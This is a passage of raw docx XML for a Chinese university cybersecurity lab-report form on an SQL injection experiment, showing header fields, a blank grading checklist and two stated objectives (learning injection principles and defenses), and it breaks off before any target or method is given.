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1179B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>网络空间安全概论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430392AA">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="83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3"/>
        <w:gridCol w:w="192"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="431"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="767"/>
        <w:gridCol w:w="2956"/>
      </w:tblGrid>
      <w:tr w14:paraId="32F6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1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B1E593F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5652CFC1">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41F90158">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>年级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08B56BD5">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i w:val="0"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2023级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7D0B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1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3507CF14">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="079FF33B">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E42E46B">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>专业、班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0741A960">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="236A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1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F25BF3C">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7117" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26263924">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>四</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SQL注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3243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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="543FA80A">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>实验时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="291E74BB">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2026.4.28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1070EF65">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>实验地点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="579CB7C7">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="微软雅黑"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>DS1408</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BB7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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5671C750">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>实验成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65F838FA">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-44" w:leftChars="-20" w:right="171" w:firstLine="220" w:firstLineChars="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EAEC4C1">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-44" w:leftChars="-20" w:right="171"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 实验性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11BF1C93">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="171"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">验证性  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">设计性  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3D1B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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0771EAD0">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>教师评价：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3849E4EF">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK20"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK6"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK31"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK45"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK65"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK48"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK46"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">算法/实验过程正确； </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">源程序/实验内容提交  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>程序结构/实验步骤合理；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E08795">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">实验结果正确；      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">语法、语义正确；     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>报告规范；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BE220B">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>评语：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462CBB57">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51" w:firstLine="330" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">                             评价教师签名（电子签名）：</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ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BA9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1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E963A65">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3139AEFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1. 学习并掌握SQL注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBD4913">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2. 学习SQL注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12B6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4" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51377A76">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>二、实验项目内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739CA153">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>对以下网站进行SQL注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F084C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
